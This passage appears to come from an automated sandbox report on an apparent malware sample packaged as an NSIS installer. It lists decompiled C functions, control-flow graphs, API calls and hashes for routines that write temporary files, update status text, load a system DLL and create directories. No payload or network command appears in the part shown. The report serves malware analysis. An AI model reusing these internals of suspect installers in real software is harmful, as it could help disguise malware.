                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\._cache_uniformerede.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                            • API String ID: 2803837635-3216040775
                                                                                                                                                                                                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                                                                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 733 40176f-401794 call 402da6 call 405fae 738 401796-40179c call 406668 733->738 739 40179e-4017b0 call 406668 call 405f37 lstrcatW 733->739 745 4017b5-4017b6 call 4068ef 738->745 739->745 748 4017bb-4017bf 745->748 749 4017c1-4017cb call 40699e 748->749 750 4017f2-4017f5 748->750 758 4017dd-4017ef 749->758 759 4017cd-4017db CompareFileTime 749->759 752 4017f7-4017f8 call 406133 750->752 753 4017fd-401819 call 406158 750->753 752->753 760 40181b-40181e 753->760 761 40188d-4018b6 call 4056ca call 403371 753->761 758->750 759->758 762 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 760->762 763 40186f-401879 call 4056ca 760->763 775 4018b8-4018bc 761->775 776 4018be-4018ca SetFileTime 761->776 762->748 797 401864-401865 762->797 773 401882-401888 763->773 777 402c33 773->777 775->776 779 4018d0-4018db FindCloseChangeNotification 775->779 776->779 780 402c35-402c39 777->780 782 4018e1-4018e4 779->782 783 402c2a-402c2d 779->783 785 4018e6-4018f7 call 4066a5 lstrcatW 782->785 786 4018f9-4018fc call 4066a5 782->786 783->777 791 401901-402398 785->791 786->791 795 40239d-4023a2 791->795 796 402398 call 405cc8 791->796 795->780 796->795 797->773 798 401867-401868 797->798 798->763
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				FILETIME* _t51;
                                                                                                                                                                                                                            				FILETIME* _t64;
                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                            				FILETIME* _t73;
                                                                                                                                                                                                                            				FILETIME* _t77;
                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                            				WCHAR* _t81;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t77 = __ebx;
                                                                                                                                                                                                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                                                                                                                                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                                                                                                                                                            				_t35 = E00405FAE( *(_t86 - 8));
                                                                                                                                                                                                                            				_push( *(_t86 - 8));
                                                                                                                                                                                                                            				_t81 = L"Call";
                                                                                                                                                                                                                            				if(_t35 == 0) {
                                                                                                                                                                                                                            					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00406668();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E004068EF(_t81);
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					__eflags =  *(_t86 + 8) - 3;
                                                                                                                                                                                                                            					if( *(_t86 + 8) >= 3) {
                                                                                                                                                                                                                            						_t66 = E0040699E(_t81);
                                                                                                                                                                                                                            						_t79 = 0;
                                                                                                                                                                                                                            						__eflags = _t66 - _t77;
                                                                                                                                                                                                                            						if(_t66 != _t77) {
                                                                                                                                                                                                                            							_t73 = _t66 + 0x14;
                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                                                                                                                            						__eflags = _t72;
                                                                                                                                                                                                                            						 *(_t86 + 8) = _t72;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                                                                                                                            					if( *(_t86 + 8) == _t77) {
                                                                                                                                                                                                                            						E00406133(_t81);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *(_t86 + 8) - 1;
                                                                                                                                                                                                                            					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                                                                                                                            					__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                                                            					 *(_t86 - 0x38) = _t43;
                                                                                                                                                                                                                            					if(_t43 != 0xffffffff) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                                                                                                                            					if( *(_t86 + 8) != _t77) {
                                                                                                                                                                                                                            						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                                                                                                                                                                            						__eflags =  *(_t86 + 8) - 2;
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                            						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                                                                                                                            						__eflags =  *0x42a2e8;
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00406668("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp", _t83);
                                                                                                                                                                                                                            						E00406668(_t83, _t81);
                                                                                                                                                                                                                            						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                                                                                                                                                            						E00406668(_t83, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp");
                                                                                                                                                                                                                            						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                            						if(_t64 == 0) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t64 == 1;
                                                                                                                                                                                                                            							if(_t64 == 1) {
                                                                                                                                                                                                                            								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                            								_t51 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push(_t81);
                                                                                                                                                                                                                            								_push(0xfffffffa);
                                                                                                                                                                                                                            								E004056CA();
                                                                                                                                                                                                                            								L29:
                                                                                                                                                                                                                            								_t51 = 0x7fffffff;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                            					return _t51;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
                                                                                                                                                                                                                            				 *0x42a314 =  *0x42a314 + 1;
                                                                                                                                                                                                                            				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                                                                                                                                                            				 *0x42a314 =  *0x42a314 - 1;
                                                                                                                                                                                                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                                                                                                                                                            				_t84 = _t45;
                                                                                                                                                                                                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                                                                                                                                                                            				__eflags = _t84 - _t77;
                                                                                                                                                                                                                            				if(_t84 >= _t77) {
                                                                                                                                                                                                                            					goto L31;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					__eflags = _t84 - 0xfffffffe;
                                                                                                                                                                                                                            					if(_t84 != 0xfffffffe) {
                                                                                                                                                                                                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                                                                                                                                                            						lstrcatW(_t81,  *(_t86 - 8));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0x200010);
                                                                                                                                                                                                                            					_push(_t81);
                                                                                                                                                                                                                            					E00405CC8();
                                                                                                                                                                                                                            					goto L29;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L33;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll$Call
                                                                                                                                                                                                                            • API String ID: 1941528284-190955987
                                                                                                                                                                                                                            • Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                                                                                                                                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 799 4056ca-4056df 800 4056e5-4056f6 799->800 801 405796-40579a 799->801 802 405701-40570d lstrlenW 800->802 803 4056f8-4056fc call 4066a5 800->803 804 40572a-40572e 802->804 805 40570f-40571f lstrlenW 802->805 803->802 808 405730-405737 SetWindowTextW 804->808 809 40573d-405741 804->809 805->801 807 405721-405725 lstrcatW 805->807 807->804 808->809 810 405743-405785 SendMessageW * 3 809->810 811 405787-405789 809->811 810->811 811->801 812 40578b-40578e 811->812 812->801
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				WCHAR* _v32;
                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				WCHAR* _t27;
                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t27 =  *0x429244;
                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                            				if(_t27 != 0) {
                                                                                                                                                                                                                            					_t37 =  *0x42a314;
                                                                                                                                                                                                                            					_v12 = _t37;
                                                                                                                                                                                                                            					_t38 = _t37 & 0x00000001;
                                                                                                                                                                                                                            					if(_t38 == 0) {
                                                                                                                                                                                                                            						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t27 = lstrlenW(0x422728);
                                                                                                                                                                                                                            					_a4 = _t27;
                                                                                                                                                                                                                            					if(_a8 == 0) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                                                                                            							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                                                                                            							_v32 = 0x422728;
                                                                                                                                                                                                                            							_v52 = 1;
                                                                                                                                                                                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                                                                                                                                                            							_v44 = 0;
                                                                                                                                                                                                                            							_v48 = _t29 - _t38;
                                                                                                                                                                                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                                                                                                                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t38 != 0) {
                                                                                                                                                                                                                            							_t28 = _a4;
                                                                                                                                                                                                                            							0x422728[_t28] = 0;
                                                                                                                                                                                                                            							return _t28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                                                                                                                            						if(_t27 < 0x1000) {
                                                                                                                                                                                                                            							_t27 = lstrcatW(0x422728, _a8);
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t27;
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
                                                                                                                                                                                                                            • API String ID: 1495540970-831635876
                                                                                                                                                                                                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                                                                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 813 4069c5-4069e5 GetSystemDirectoryW 814 4069e7 813->814 815 4069e9-4069eb 813->815 814->815 816 4069fc-4069fe 815->816 817 4069ed-4069f6 815->817 819 4069ff-406a32 wsprintfW LoadLibraryExW 816->819 817->816 818 4069f8-4069fa 817->818 818->819
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004069C5(intOrPtr _a4) {
                                                                                                                                                                                                                            				short _v576;
                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t17;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                                                                                                                                            				if(_t13 > 0x104) {
                                                                                                                                                                                                                            					_t13 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                                                                                                                            					_t19 = 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t19 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                                                                                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                                                                                                                            				return _t17;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00406A17
                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                                                                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 820 405b99-405be4 CreateDirectoryW 821 405be6-405be8 820->821 822 405bea-405bf7 GetLastError 820->822 823 405c11-405c13 821->823 822->823 824 405bf9-405c0d SetFileSecurityW 822->824 824->821 825 405c0f GetLastError 824->825 825->823
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405B99(WCHAR* _a4) {
                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                                                                            				_v36.Owner = 0x4083f8;
                                                                                                                                                                                                                            				_v36.Group = 0x4083f8;
                                                                                                                                                                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                                                                            				_v36.Revision = 1;
                                                                                                                                                                                                                            				_v36.Control = 4;
                                                                                                                                                                                                                            				_v36.Dacl = 0x4083e8;
                                                                                                                                                                                                                            				_v16.nLength = 0xc;
                                                                                                                                                                                                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                                                                                                                            				if(_t22 != 0) {
                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t23 = GetLastError();
                                                                                                                                                                                                                            				if(_t23 == 0xb7) {
                                                                                                                                                                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                                                                                                            						goto L1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t23;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
